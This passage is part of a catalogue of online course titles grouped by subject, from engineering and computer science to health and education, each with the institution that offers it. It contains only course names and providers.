University of Science and Technology Automated Software Testing: Practical Skills for Java Developers from Delft University of Technology Automated Software Testing: Advanced Skills for Java Developers from Delft University of Technology Погружение в Python from Moscow Institute of Physics and Technology Основы разработки на C++: красный пояс from Moscow Institute of Physics and Technology AR (Augmented Reality) & Video Streaming Services Emerging Technologies from Yonsei University Smart Device & Mobile Emerging Technologies from Yonsei University Problem Solving, Programming, and Video Games from University of Alberta Introduction to Augmented Reality and ARCore from Google Daydream Impact Fundamentals of NetLogo from Santa Fe Institute Competitive Programmer’s Core Skills from Saint Petersburg State University Business Problems and Software Solutions from Deakin University Введение в язык Котлин from St. Petersburg State Polytechnic University Web Accessibility for Developers from Ryerson University Handheld AR App Development with Unity from Unity Diseño de Sistemas de información gerencial para Internet con MySQL / PHP y Joomla from Universidad del Rosario Kotlin for Java Developers from JetBrains Introduction to XR: VR, AR, and MR Foundations from Unity 3D Art and Audio Pipeline from Unity Application Systems Programming from Unity 3D Interactions and Navigation from Unity Core Interaction Programming from Unity ENGINEERING Analysis of Transport Phenomena I: Mathematical Methods from Massachusetts Institute of Technology Engineering the Space Shuttle from Massachusetts Institute of Technology The Art of Structural Engineering: Vaults from Princeton University Collaborative Robot Safety: Design & Deployment from University at Buffalo Electric Power Systems from University at Buffalo Modern Robotics, Course 5: Robot Manipulation and Wheeled Mobile Robots from Northwestern University Le robot Thymio comme outil de découverte des sciences du numérique from École Polytechnique Fédérale de Lausanne Principle of Semiconductor Devices Part I: Semiconductors, PN Junctions and Bipolar Junction Transistors from The Hong Kong University of Science and Technology Hello (Real) World with ROS – Robot Operating System from Delft University of Technology Mind of the Universe – Robots in Society: Blessing or Curse? from Delft University of Technology Hyperloop: Changing the Future of Transportation from Delft University of Technology Electric Cars: Technology from Delft University of Technology Electric Cars: Policy from Delft University of Technology Through Engineers’ Eyes – Expanding the Vision: Engineering Mechanics by Experiment, Analysis and Design from University of New South Wales Through Engineers’ Eyes – Introducing the Vision: Engineering Mechanics by Experiment, Analysis and Design from University of New South Wales First Order Optical System Design from University of Colorado Boulder Design of High-Performance Optical Systems from University of Colorado Boulder Optical Efficiency and Resolution from University of Colorado Boulder Motors and Motor Control Circuits from University of Colorado Boulder Semiconductor Physics from University of Colorado Boulder Sensors and Sensor Circuit Design from University of Colorado Boulder Transistor – Field Effect Transistor and Bipolar Junction Transistor from University of Colorado Boulder Diode – pn Junction and Metal Semiconductor Contact from University of Colorado Boulder Diseño de diques rompeolas con cubípodos from Universitat Politècnica de València Introducción a la energía solar fotovoltaica: El módulo fotovoltaico from Universitat Politècnica de València Introducción a los encofrados y las cimbras en obra civil y edificación from Universitat Politècnica de València BIM Fundamentals for Engineers from National Taiwan University BIM Application for Engineers from National Taiwan University Distribución de la energía eléctrica from Tecnológico de Monterrey Smart grid: fundamentos técnicos from Tecnológico de Monterrey Transmisión de energía eléctrica from Tecnológico de Monterrey Energía eléctrica: conceptos y principios básicos from Tecnológico de Monterrey Smart grid: las redes eléctricas del futuro from Tecnológico de Monterrey Essentials of MOSFETs from Purdue University Fundamentals of Current Flow from Purdue University Primer on Semiconductor Fundamentals from Purdue University Introduzione ai circuiti elettrici from University of Naples Federico II Standardisation from EIT Digital Introduction to battery-management systems from University of Colorado System Equivalent Circuit Cell Model Simulation from University of Colorado System Battery State-of-Charge (SOC) Estimation from University of Colorado System Introduction to Web Cartography: Part 2 from ETH Zurich High Performance Finite Element Modeling – Part 2 from KTH Royal Institute of Technology Energy Systems Integration: A Trend or a Revolution? from KU Leuven University Propagation radio from Institut Mines-Télécom “Monotsukuri” Making Things in Japan: Mechanical Engineering from Tokyo Institute of Technology Ingeniería de Tráfico from Pontificia Universidad Católica de Chile Introducción al Control Numérico por Computadora from TenarisUniversity Agile for Project Control from University System of Maryland COMPUTER SCIENCE Machine Learning with Python: from Linear Models to Deep Learning from Massachusetts Institute of Technology Blockchain Technology from University of California, Berkeley Bitcoin and Cryptocurrencies from University of California, Berkeley Introduction to Machine Learning from Duke University Introduction to Computer Programming from University of London International Programmes How Computers Work from University of London International Programmes IT Infrastructure and Emerging Trends from University of Minnesota Enterprise Systems from University of Minnesota IS/IT Governance from University of Minnesota Embedded Software and Hardware Architecture from University of Colorado Boulder Industrial IoT Markets and Security from University of Colorado Boulder Введение в технологию блокчейн from Moscow Institute of Physics and Technology 人工智慧：機器學習與理論基礎 (Artificial Intelligence – Learning & Theory) from National Taiwan University Introducción al diseño de hardware con Verilog from Galileo University IoT (Internet of Things) Wireless & Cloud Computing Emerging Technologies from Yonsei University Introduzione all’informatica from University of Naples Federico II Il linguaggio naturale, dall’uomo alla macchina from University of Naples Federico II Nuove tecnologie digitali from University of Naples Federico II C Programming: Language Foundations from Institut Mines-Télécom C Programming: Modular Programming and Memory Management from Dartmouth C Programming: Advanced Data Types from Dartmouth Linux Basics: The Command Line Interface from Dartmouth C Programming: Using Linux Tools and Libraries from Dartmouth C Programming: Getting Started from Dartmouth C Programming: Pointers and Memory Management from Dartmouth Introduction to Computation Theory from Santa Fe Institute Fundamentals of Machine Learning from Santa Fe Institute Introduction to FinTech from The University of Hong Kong FinTech Ethics and Risks from The University of Hong Kong Blockchain and FinTech: Basics, Applications, and Limitations from The University of Hong Kong DDoS Attacks and Defenses from University of Colorado System Cloud Computing Security from University of Colorado System Introducción a la programación en C: Instrucciones de control y ficheros de texto from Universidad Autónoma de Madrid Introducción a la programación en C: Tipos de datos y estructuras from Universidad Autónoma de Madrid Introducción a la programación en C: Funciones y punteros from Universidad Autónoma de Madrid Cyber-Physical Networks from KTH Royal Institute of Technology Comprendre le coeur d’internet : les réseaux d’opérateurs from Institut Mines-Télécom Advanced Algorithmics and Graph Theory with Python from Institut Mines-Télécom Arduino Programming, from novice to ninja from Institut Mines-Télécom Ciberseguridad: ataques y contramedidas from Universidad Rey Juan Carlos Digital Transformation and the IT Team from University of the Witwatersrand Strategic and Transformational IT from University System of Maryland Basics of Network Security from Coventry University An Introduction to Cryptography from Coventry University Diseño de sistemas de información gerencial para intranet con Microsoft Access from Universidad del Rosario Palo Alto Networks Cybersecurity Essentials I from Palo Alto Networks Palo Alto Networks Academy Cybersecurity Foundation from Palo Alto Networks Palo Alto Networks Cybersecurity Gateway I from Palo Alto Networks Palo Alto Networks Cybersecurity Gateway II from Palo Alto Networks Palo Alto Networks Cybersecurity Essentials II from Palo Alto Networks Blockchain: Foundations and Use Cases from ConsenSys Academy Networking and Security Architecture with VMware NSX from VMware SOCIAL SCIENCES Citizen Politics in America: Public Opinion, Elections, Interest Groups, and the Media from Harvard University U.S. Public Policy: Social, Economic, and Foreign Policies from Harvard University American Government: Constitutional Foundations from Harvard University U.S. Political Institutions: Congress, Presidency, Courts, and Bureaucracy from Harvard University Lean Research Skills for Conducting Interviews from Massachusetts Institute of Technology Creating an Effective Child Welfare System from University of Pennsylvania Listening to Puerto Rico Teach-Out from University of Michigan Crisis at the Border Teach-Out from University of Michigan Exploring Basic Income in a Changing Economy Teach-Out from University of Michigan Community Engagement: Collaborating for Change from University of Michigan Civil Liberties from Princeton University Corporate & Commercial Law II: Business Forms, Financing & Governmental Regulation from University of Illinois at Urbana-Champaign Understanding Gender Identity: Trans People in the Workplace from The Open University Make Change Happen from The Open University Introduction to English Common Law from University of London International Programmes African cities : An Introduction to Urban Planning from École Polytechnique Fédérale de Lausanne Groundscape Architecture Design Lab, re-thinking cities underground from École Polytechnique Fédérale de Lausanne Logic for Economists from University of Amsterdam Mathematics for economists from Higher School of Economics Возможно ли воспитать детей «правильно»? from Higher School of Economics Monetary Policy in the Asia Pacific from The Hong Kong University of Science and Technology Copyright Law in the Music Business from Berklee College of Music Business Opportunities and Risks in a Globalized Economy from IE Business School Xi Jinping’s Thought on Socialism with Chinese Characteristics for a New era|习近平新时代中国特色社会主义思想 from Tsinghua University Exploring Psychology’s Core Concepts|走进心理学 from Tsinghua University Accessibility to the Scenic Arts from Universitat Autònoma de Barcelona (Autonomous University of Barcelona) Originalité et modernité du mutualisme from ESSEC Business School Belong / Appartenir: Community, Race, and Space in the U.S. and France from Davidson College Survey Research Methodology from Politecnico di Milano Action Learning for Inclusion from Politecnico di Milano Regards croisés sur les migrations from Université catholique de Louvain SDG: Moving Towards Sustainable Work from Universidad Carlos iii de Madrid Conversazioni di diritto amministrativo from University of Naples Federico II Introducción a la teoría política: conceptos y grandes pensadores from University of Naples Federico II Comparative Political Systems from University of Naples Federico II Contemporary Issues in World Politics from University of Naples Federico II Global Politics from University of Naples Federico II La riforma del lavoro in Italia from University of Naples Federico II Le politiche pubbliche come strategia di governo from University of Naples Federico II Le forme di governo nel mondo from University of Naples Federico II Comparative Research Designs and Methods from University of Naples Federico II Psicologia della personalità: un’introduzione from University of Naples Federico II Come fare ricerca nelle scienze sociali from University of Naples Federico II Landscape Finance: Investing in Innovation for Sustainable Landscapes from Wageningen University Landscape Governance: Collaborating Across Sectors and Scales from Wageningen University Landscape Leadership: Catalyse Sustainable Development in Landscapes from Wageningen University Development and Planning in African Cities: Exploring theories, policies and practices from Sierra Leone from University College London Vote For Ethics: A How-to Guide for Voters (Alumni Students) from Santa Clara University Vote For Ethics: A How-to Guide for Voters from Santa Clara University The Presidency and the Shape of the Supreme Court from Trinity College Sustainable Construction and Development from London South Bank University Globalisation and Sustainable Development from Curtin University Circular Economy – Sustainable Materials Management from Ghent University Social Change: How Can Marketing Help? from Griffith University Supporting Adolescent Learners: Social and Emotional Wellbeing from Griffith University Правовое обеспечение бизнеса в России from Saint Petersburg State University Neurociencia empresarial: siete claves para la PYME from Universidad Rey Juan Carlos Des réseaux pour comprendre le monde from Université Paris 1 Panthéon-Sorbonne Sustainable Development: The Water-Energy-Food Nexus from RWTH Aachen University Osez le numérique dans l’Economie Sociale, l’Habitat Social et la Protection Sociale ! from Université Jean Moulin Lyon 3 The Supreme Court & American Politics from University System of Maryland Security, Terrorism and Counterterrorism from Murdoch University Микроэкономика (вводный курс) from Moscow State Institute of International Relations (MGIMO) Le consommateur connecté & ses données personnelles from Institut national de la consommation Communicating Effectively with Vulnerable Children and Young People from University of Kent SCIENCE The Health Effects of Climate Change from Harvard University Backyard Meteorology: The Science of Weather from Harvard University Quantum Information Science II: Efficient Quantum Computing – fault tolerance and complexity from Massachusetts Institute of Technology Quantum Information Science II: Quantum states, noise and error correction from Massachusetts Institute of Technology Quantum Information Science II: Advanced quantum algorithms and information theory from Massachusetts Institute of Technology Nuclear Energy: Science, Systems and Society from Massachusetts Institute of Technology Nitrogen: A Global Challenge (Hungarian) from University of Edinburgh Nitrogen: A Global Challenge from University of Edinburgh Global Arctic from École Polytechnique Fédérale de Lausanne The Multi-scale brain from École Polytechnique Fédérale de Lausanne Conservation & Protected Areas Management in Africa from École Polytechnique Fédérale de Lausanne Gestion des aires protégées en Afrique from École Polytechnique Fédérale de Lausanne Equine Welfare and Management from University of California, Davis Open Science: Sharing Your Research with the World from Delft University of Technology The Building Blocks of a Quantum Computer: Part 1 from Delft University of Technology The Building Blocks of a Quantum Computer: Part 2 from Delft University of Technology Ácidos y bases: reacciones químicas y aplicaciones from Universitat Politècnica de València Sales: reacciones químicas y aplicaciones from Universitat Politècnica de València Small and Mighty: Introduction to Microbiology from University of Reading Mercados de carbono: una forma de mitigar el cambio climático from Tecnológico de Monterrey Ahorro de energía from Tecnológico de Monterrey Huella Hídrica: una mirada integral al uso del agua from Tecnológico de Monterrey Física: Vectores, Trabajo y Energía from Tecnológico de Monterrey Física: Dimensión y Movimiento from Tecnológico de Monterrey Introduction to the Schrödinger Equation and Quantum Transport from Purdue University D’un infini à l’autre – Voyages de l’infiniment grand à l’infiniment petit from École Polytechnique Case Study Methodology from Politecnico di Milano Nuclear Reactor Physics Basics from National Research Nuclear University MEPhI Methods of Surface Analysis from National Research Nuclear University MEPhI La fisica: dall’elettromagnetismo all’ottica from University of Naples Federico II La genetica tra scienza, storia e società from University of Naples Federico II Zoologia from University of Naples Federico II Astro 101: Black Holes from University of Alberta Catalytic Conversions for Biobased Chemicals and Products from Wageningen University Biorefinery: From Biomass to Building Blocks of Biobased Products from Wageningen University From Fossil Resources to Biomass: A Business and Economics Perspective from Wageningen University Climate Adaptation in Africa from University of Cape Town The Science Behind Forensic Science from King’s College London Sex and Human Reproduction from University of Adelaide Research Impact: Making a Difference from University of Glasgow Metagenomics applied to surveillance of pathogens and antimicrobial resistance from Technical University of Denmark (DTU) 走进天文学 from Nanjing University Our Place in the Universe from The University of Hong Kong Landscape Ecology from ETH Zurich Systematic Innovation for Life Science from Karolinska Institutet Why Planning Your Research Matters from Deakin University Protists: Evolution and Ecology of Microbial Eukaryotes from Saint Petersburg State University Air pollution: causes and impacts from Institut Mines-Télécom Metal and Metalloids of the Main Groups: Basis and Their Role in the Daily Life from Universidad Rey Juan Carlos Gulf Stories 2 from University of West Florida Citizen Research: From Data to Action from University of Dundee Research integrity in scientific professions from Université de Bordeaux Intégrité scientifique dans les métiers de la recherche from Université de Bordeaux Conceptos base para el estudio del medio ambiente from Universidad Austral Introducción a la gravedad cuántica de lazos from Universidad Nacional de Córdoba Introducción a los ritmos y relojes biológicos from Universidad Nacional de Córdoba Chimie : ouvrez les portes de l’enseignement supérieur ! from University of Liège Global Biosecurity for One Health from Murdoch University ART & DESIGN 18th-Century Opera: Handel & Mozart from Harvard University Avatar Psychology for Designers from Michigan State University Web Design: Wireframes to Prototypes from California Institute of the Arts UX Design Fundamentals from California Institute of the Arts Visual Elements of User Interface Design from California Institute of the Arts Percepção Musical from Berklee College of Music Guitar Scales and Chord Progressions from Berklee College of Music Fundamentos de la guitarra eléctrica y acústica from Berklee College of Music Разработка инновационного продукта from Moscow Institute of Physics and Technology Radio para internet con Podcast: creación y conceptos básicos from Universitat Politècnica de València Sustainability in Architecture: An Interdisciplinary Introduction from Universitat Politècnica de València Realistic Architectural 3D Modeling from Indian Institute of Technology Bombay 3D Modeling from Architectural Drawings from Indian Institute of Technology Bombay Flower Arrangements in China and Japan | 现代生活美学：花之道 from Tsinghua University L’écoute en jeu(x) : une introduction à la musicologie from Université Paris-Saclay Introducing Metadesign from Politecnico di Milano Caligrafía y paleografía: espacios históricos para su estudio y práctica from Universidad Carlos iii de Madrid Adobe Illustrator: aprende a crear presentaciones de impacto from The Pontificia Universidad Javeriana Innovation Through Design: Think, Make, Break, Repeat from The University of Sydney Interpreting Vernacular Architecture in Asia from The University of Hong Kong Creative Thinking: Techniques and Tools for Success from Imperial College London Music Psychology: Why Does “Bohemian Rhapsody” Feel so Good? from Griffith University Exploring Japanese Avant-garde Art Through Butoh Dance from Keio University The Power of Podcasting for Storytelling from University of Wollongong Learn Jazz Piano: III. Solo Piano and Advanced Topics from Goldsmiths University of London Основы фотографии from Novosibirsk State University Растровая графика. Adobe Photoshop CC from St. Petersburg State Polytechnic University The Dream of Streaming: Rethinking the Role of On-Demand Entertainment from Coventry University MATHEMATICS Introduction to Probability from Harvard University Differential Equations: Fourier Series and Partial Differential Equations from Massachusetts Institute of Technology Probability – The Science of Uncertainty and Data from Massachusetts Institute of Technology Fundamentals of Statistics from Massachusetts Institute of Technology Causal Inference from Columbia University Probability and Statistics: To p or not to p? from University of London International Programmes Introduction au raisonnement mathématique : préparation à l’entrée dans l’enseignement supérieur from École Polytechnique Matrix Algebra for Engineers from The Hong Kong University of Science and Technology Introducción a las ecuaciones diferenciales from Galileo University Laboratorio di Matematica per Architettura from Politecnico di Milano Automated Reasoning: satisfiability from EIT Digital Random Walks from Santa Fe Institute Game Theory II- Dynamic Games from Santa Fe Institute Introduction to Information Theory from Santa Fe Institute Functions and Iterations from Santa Fe Institute Introduction to Renormalization from Santa Fe Institute Introduction to Differential Equations from Santa Fe Institute Ordinary Differential Equations from Santa Fe Institute Game Theory I – Static Games from Santa Fe Institute Maximum Entropy Methods from Santa Fe Institute Vector and Matrix Algebra from Santa Fe Institute Sta(r)tistics: Statistics for everyone – Applied statistics for new science students from University of Sunderland HUMANITIES Othello’s Story from Harvard University PredictionX: Lost Without Longitude from Harvard University Sikhism Through Its Scriptures from Harvard University The Tabernacle in Word & Image: An Italian Jewish Manuscript Revealed from University of Pennsylvania HOPE: Human Odyssey to Political Existentialism from Princeton University Sports Marketing from Northwestern University Introduction to Research Ethics: Working with People from University of Leeds Introduction to Linguistics from University of Birmingham Violences et religions from University of Geneva Upper-Intermediate English: Technology Today from Universitat Politècnica de València Upper-Intermediate English: Globalization from Universitat Politècnica de València Upper-Intermediate English: Modern Life from Universitat Politècnica de València Upper-Intermediate English: Business from Universitat Politècnica de València 莊子─人情 (Zhuangzi─Between People) from National Taiwan University Learning Chinese : Start From Scratch (零到一學中文) from National Taiwan University Ideological & Moral Cultivation and Fundamentals of Law|思想道德修养与法律基础 from Tsinghua University Develop Your Cultural Intelligence from Purdue University Mandarin Chinese for Intermediate Learners: Part 1 from Shanghai Jiao Tong University Imparare il latino attraverso lo studio dei papiri from University of Naples Federico II Dialetti in Italia from University of Naples Federico II Letteratura latina, dalle origini all’età augustea from University of Naples Federico II Perdón y reconciliación: cómo sanar heridas from The Pontificia Universidad Javeriana Learning Spanish in Paradise from The Pontificia Universidad Javeriana Sports Coaching: How effective are you? from IOC Athlete MOOC John Milton: Paradise Lost from Dartmouth Religious Transformation in Early China: the Period of Division from The Chinese University of Hong Kong The Book of Kells: Exploring an Irish Medieval Masterpiece from Trinity College Dublin Toledo: Deciphering Secrets of Medieval Spain from University of Colorado System Lancaster Castle and Northern English History: The View from the Stronghold from Lancaster University Learning from the Past: A Guide for the Curious Researcher from The University of Nottingham How We Remember War and Violence: Theory and Practice from University of Bath Introducción al griego clásico from Universidad Autónoma de Madrid Noongar Language and Culture from Curtin University A Question of Time: How We Date Human Evolution from Griffith University Взаимодействие языков и культур: сохраняем и расширяем свою идентичность (на примере изучения татарского языка как родного и иностранного) from Tomsk State University Русский язык как иностранный B2-2 from Saint Petersburg State University Histoire des représentations et du traitement de la folie from Paris Diderot University School of Salamanca from Universidad Francisco Marroquín New Zealand Landscape as Culture: Maunga (Mountains) from Victoria University of Wellington Coaching the Mental Game from Deakin University Civil Society and African Media Policy in the Digital Age from University of the Witwatersrand Verdun d’hier à aujourd’hui from Université de Lorraine Activism and Citizen Journalism through Media from University of the Witwatersrand Media Literacy and Representation from University of Newcastle Digital Wellbeing from University of York Renforcer ses compétences orthographiques from Université de Caen Normandie Éthique de la recherche from Université de Lyon Irish 104: An Introduction to Irish Language and Culture from Dublin City University Norwegian for Beginners 1 from Norwegian University of Science and Technology Mindfulness: What It Is, Where It Comes From, and How to Practice It from Naropa University Irish 106: An Introduction to Irish Language and Culture from Dublin City University La Gestothèque from Sorbonne Paris Cité University Le bien-être des animaux d’élevage from VetAgro Sup Pratiques de l’enseignement de la prononciation en FLE from Université fédérale de Toulouse Midi-Pyrénées Cours de stratégie de l’École de Guerre (Partie I) from École Pratique des Hautes Études Irish 105: An Introduction to Irish Language and Culture from Dublin City University ga094: 東日本大震災の教訓を活かした実践的防災学へのアプローチ from Tohoku University BUSINESS Improving Your Business Through a Culture of Health from Harvard University Introduction to Systematic Reviews from Stanford Medicine The Role of Impact Assessments in Real Estate Development from Massachusetts Institute of Technology Creating Shared Benefits in Real Estate Development from Massachusetts Institute of Technology FinTech Law and Policy from Duke University Auditing I: Conceptual Foundations of Auditing from University of Illinois at Urbana-Champaign Auditing II: The Practice of Auditing from University of Illinois at Urbana-Champaign Managing My Money for Young Adults from The Open University Using Email for Networking in English from University of Washington Natural Gas from University at Buffalo Safety in the Utility Industry from University at Buffalo Energy Industry: The Enterprise from University at Buffalo Agile Meets Design Thinking from University of Virginia Customer Segmentation and Prospecting from Northwestern University Building a Toolkit for Your Sales Process from Northwestern University Sales Pitch and Closing from Northwestern University Connecting with Sales Prospects from Northwestern University Юридическое оформление инвестиционных идей from Higher School of Economics FinTech Security and Regulation (RegTech) from The Hong Kong University of Science and Technology FinTech Risk Management from The Hong Kong University of Science and Technology Market Segmentation Analysis from University of Queensland Influencing Stakeholders: Dealing with Power and Dynamics in Teams and Networks from Delft University of Technology Waste Management and Critical Raw Materials from Delft University of Technology Sustainable Packaging in a Circular Economy from Delft University of Technology Effective Decision Making: Dealing with Business Complexity from Delft University of Technology Electric Cars: Business from Delft University of Technology Measure and Improve Innovation at the Workplace from Universitat Politècnica de València Branding: ¿cómo convertirte en una gran marca? from Universitat Politècnica de València Foreign Exchange Markets: Concepts, Instruments, Risks and Derivatives from Indian Institute of Management Bangalore Special Topics in Risk Management of Banking and Financial Markets from Indian Institute of Management Bangalore Banking & Financial Intermediation: Concepts, Risks, Capital & Regulation from Indian Institute of Management Bangalore Risk Management in Banking and Financial Markets Professional Certificate Exam from Indian Institute of Management Bangalore Money & Debt Markets: Concepts, Instruments, Risks and Derivatives from Indian Institute of Management Bangalore Equity Stock Markets: Concepts, Instruments, Risks and Derivatives from Indian Institute of Management Bangalore 服務模式的體驗、設計與創新：從痛點到賣點 from National Taiwan University Mercados de energía: oportunidades de negocio from Tecnológico de Monterrey Liderazgo en la empresa familiar from Tecnológico de Monterrey Fundamentos del emprendimiento en la empresa familiar from Tecnológico de Monterrey Intelligence Tools for the Digital Age from IE Business School Social and Digital Media Analytics from Purdue University Introduction to Strategic Doing: An Agile Approach to Strategy from Purdue University L’innovation managériale en pratique from ESSEC Business School L’excellence opérationnelle en pratique from ESSEC Business School Designing and Implementing Effective Entrepreneurship Policies from Politecnico di Milano Человеческий фактор в разработке корпоративных систем from National Research Nuclear University MEPhI Strategie di produzione e sistemi di logistica from University of Naples Federico II Financial Regulation in Emerging Markets and the Rise of Fintech Companies from University of Cape Town Executing Breakthrough Innovations with the Three Box Solution from Dartmouth Developing Breakthrough Innovations with the Three Box Solution from Dartmouth Influencer Marketing Strategy from Rutgers University Supply Chain Analytics Essentials from Rutgers University Culture of Services: Paradox of Customer Relations from Kyoto University Finance for Startups from Korea Advanced Institute of Science and Technology Advanced Valuation and Strategy – M&A, Private Equity, and Venture Capital from Erasmus University Rotterdam Organisational design: Know your organisation from Macquarie University Organisational behaviour: Know your people from Macquarie University Risk Management of Work Related injuries using RAMP II from KTH Royal Institute of Technology Proficiency in using RAMP for Risk Management of work-related injuries from KTH Royal Institute of Technology Assessment of Work-Related Injury Risks using RAMP I from KTH Royal Institute of Technology Entreprendre dans les Industries Culturelles à l’ère du numérique from Institut d’Etudes Politiques de Paris Прикладное управление рисками from Tomsk State University Практики создания аналитических панелей в среде Microsof Power BI from Saint Petersburg State University Основы налогообложения бизнеса в России from Saint Petersburg State University Основы бизнес-планирования и маркетинга from Saint Petersburg State University Emprendimiento: cómo gestionar el desarrollo tecnológico de una startup from Universidad Rey Juan Carlos Управление людьми и командами from Saint Petersburg State University Discover the Leader in You: Six Questions to Ask Yourself from Austin Peay State University Dans le secteur alimentaire, le digital : c’est primordial ! from Université Jean Moulin Lyon 3 Banque, assurance, assistance : le digital, une opportunité à saisir ! from Université Jean Moulin Lyon 3 SMEs and New Markets: Trade, the Chinese Powerhouse and Online Opportunities from Deakin University SMEs and Digital Engagement from Deakin University MAPs-Management des Alliances, des Partenariats et de la Coopétition from Université Montpellier 2 Маркетинг. Часть 2. Инструментарий маркетинга from St. Petersburg State Polytechnic University Data Analysis for Decision Making from University System of Maryland Applied Scrum for Project Management from University System of Maryland Leadership and Influence from University System of Maryland Управление человеческими ресурсами from St. Petersburg State Polytechnic University Driving Speed through Agile Planning from University System of Maryland Global Business Strategy from University System of Maryland Corporate Finance from University System of Maryland Agile Solutions for Greater Innovation from University System of Maryland Agile Leadership Principles from University System of Maryland The Importance of Project Management in the Global Construction Industry from Coventry University An Introduction to Financial Management in Construction from Coventry University Principles of Service Management from Hanken School of Economics Комплекс маркетинга: 5Р from Moscow State Institute of International Relations (MGIMO) An Introduction to the Assessment of People at Work from Coventry University Финансы компаний: взгляд инвестора и кредитора from Sberbank Corporate University Introducción a la Siembra Directa from Universidad Nacional de Córdoba Bridging the Gap between Strategy Design and Delivery from Brightline Initiative An Introduction to Organisational Behaviour: How to Understand Your People from Coventry University Understanding Financial Statements from Coventry University L’Aviculture, une filière d’avenir from Agrocampus Ouest Introducción a las finanzas: Principios de valoración from Universidad del Rosario Management Essentials from Honeywell Biobased Business Development from HZ University of Applied Sciences HEALTH & MEDICINE Antibiotic Stewardship from Stanford University Fighting HIV with Antiretroviral Therapy: Implementing the Treat-All Approach from Columbia University Pediatric HIV Nursing from Columbia University Managing Your Health: The Role of Physical Therapy and Exercise from University of Toronto Cancer Survivorship for Primary Care Practitioners from University of Melbourne Introduction a l’immunologie from École Polytechnique Fédérale de Lausanne Environmental Public Health from Ohio State University Fundamentals of Pharmacology from Ohio State University Drugs, drug use, drug policy and health from University of Geneva Biohacking Your Brain’s Health from Emory University Beyond Medical Histories: Gaining Insight from Patient Stories from Brown University Actúa ante el dolor crónico from Universitat Autònoma de Barcelona (Autonomous University of Barcelona) Microbiologia e immunologia from University of Naples Federico II Nutrition, Heart Disease and Diabetes from Wageningen University Nutrition and Cancer from Wageningen University Ortodoncia: tratamientos dentales sencillos para casos complejos from The Pontificia Universidad Javeriana Integrating Care: Depression, Anxiety and Physical Illness from King’s College London Medical Cannabis for Pain Control from Technion – Israel Institute of Technology Agir pour la santé des reins from Sorbonne Universités An Introduction to Radiation Oncology: From Diagnosis to Survivorship from Trinity College Dublin Introduction to: Physical Examination and History Taking from Karolinska Institutet Diabetic Eye Disease: Strengthening Services from London School of Hygiene & Tropical Medicine Organ Donation: The Essentials for Healthcare Professionals from St. George’s University Future-proofing the Health Workforce from Griffith University Assessment of the Newborn from Griffith University Bridging healthcare and society from Tomsk State University Grundlagen der Unfallchirurgie from Technische Universität München (Technical University of Munich) Health and healthcare in transition: dilemmas of governance from Tomsk State University Essentials of Good Pharmacy Practice: The Basics from Taipei Medical University El dolor lumbar: Mucho más que un dolor from Universidad Rey Juan Carlos Maladie de Parkinson from Université de Nantes Developing Clinical Empathy: Making a Difference in Patient Care from St George’s, University of London Principles of Health Law and Regulatory Issues from Doane University Health Informatics Technology in Population Healthcare Analytics from Doane University U.S. Healthcare Systems from Doane University Population Health: Disease Prevention and Management from Doane University Fundamentals of Advocacy in Health Policy from Doane University Applying Leadership and Strategy Fundamentals in Healthcare from Doane University Healthcare Administration Comprehensive Exam from Doane University Leading Organizational Change in Healthcare from Doane University Strategic Leadership in Healthcare from Doane University Understanding Different Diets: Mediterranean, Baltic sea, and Okinawa from EIT Food Essentials of Lifestyle Medicine and Population Health from Doane University Introduction to Lifestyle Medicine from Doane University Organizational Culture and Change in Healthcare from Doane University Health Law, Policy, and Advocacy from Doane University Healthcare Finance, Economics and Risk from Doane University Vulnerable Populations from Doane University Healthcare Organization and Delivery Models from Doane University Health Informatics and Technology in Decision Making from Doane University Could You Be the Next Florence Nightingale? from Coventry University An Introduction to Physical Health Assessment from Coventry University Food for Thought: The Relationship Between Food, Gut and Brain from EIT Food Certified Lifestyle Medicine Executive Comprehensive Exam from Doane University Sweet Dreams from Communauté Université Grenoble Alpes DATA SCIENCE Data Analysis in Social Science—Assessing Your Knowledge from Massachusetts Institute of Technology Capstone Exam in Statistics and Data Science from Massachusetts Institute of Technology Image Processing and Analysis for Life Scientists from École Polytechnique Fédérale de Lausanne Big Data Emerging Technologies from Yonsei University Foundations of mining non-structured medical data from EIT Digital Data Science for Environmental Modelling and Renewables from University of Glasgow Técnicas de Análisis de Datos y Big Data from Universidad Rey Juan Carlos Практики работы с данными средствами Power Query и Power Pivot from Saint Petersburg State University Information Visualization: Applied Perception from New York University (NYU) Information Visualization: Foundations from New York University (NYU) Information Visualization: Advanced Techniques from New York University (NYU) Information Visualization: Programming with D3.js from New York University (NYU) Introducción a la Minería de Datos from Pontificia Universidad Católica de Chile EDUCATION & TEACHING College Algebra from Johns Hopkins University Calculus from Modern States College Mathematics from Modern States Precalculus from Modern States Assessment for Learning from University of Illinois at Urbana-Champaign Learning, Knowledge, and Human Development from University of Illinois at Urbana-Champaign Financial Accounting from Modern States Information Systems from State University of New York Western Civilization I: Ancient Near East to 1648 from State University of New York Principles of Management from Modern States Scratch: Programming for Teachers from Delft University of Technology Scratch: Programming for Kids (8+) from Delft University of Technology Теория и практика создания онлайн-курсов from Moscow Institute of Physics and Technology Biology from Purdue University Physique : préparation à l’entrée dans l’enseignement supérieur from École Polytechnique Contenido de las matemáticas de primaria from Universidad de los Andes PlanU: escoge la mejor carrera y universidad para ti from Universidad de los Andes Creating Apps in the Classroom from Queensland University of Technology Teaching Phonics in Early Childhood from Queensland University of Technology Modelli di insegnamento nella ricerca educativa from University of Naples Federico II Teaching the Beauty and Joy of Computing Curriculum from Friday Institute American Government from Modern States Understanding and Teaching Evolution from University of Bath Good Practice in Autism Education from University of Bath How to Succeed in Your Welsh Bacc: the Individual Project Essentials from University of Bath Introductory Sociology from New York Institute of Technology Innovating Instruction: Learning Design in the STEM Classroom from Teachers College, Columbia University Enhancing Catholic School Identity from KU Leuven University University Governance and Academic Leadership from Vrije Universiteit Brussel Enseñar, aprender y evaluar en Escuelas Rurales from Universidad Austral La escuela y su comunidad: lecciones desde la ruralidad from Universidad Austral Gestión estratégica de Escuelas en Contextos Rurales from Universidad Austral Educación en Contextos Rurales: Perspectivas en América Latina from Universidad Austral Developing Your Educational Leadership and Management Vision from University of Newcastle Applying Strategic Leadership in Education from University of Newcastle Leading Transformative Change in Education from University of Newcastle Your Adventure Story: From Home to a US University from University of Denver English Literature from Modern States College Composition from Modern States Analyzing and Interpreting Literature from Modern States American Literature from Modern States Natural Sciences from Modern States Western Civilization II: 1648 to the Present from Modern States Spanish Language from Modern States French Language from Modern States Humanities from Modern States Human Growth and Development from Modern States Introduction to Educational Psychology from Modern States German Language from American University Éducation par la recherche : le pédagogue chercheur from Sorbonne Paris Cité University PERSONAL 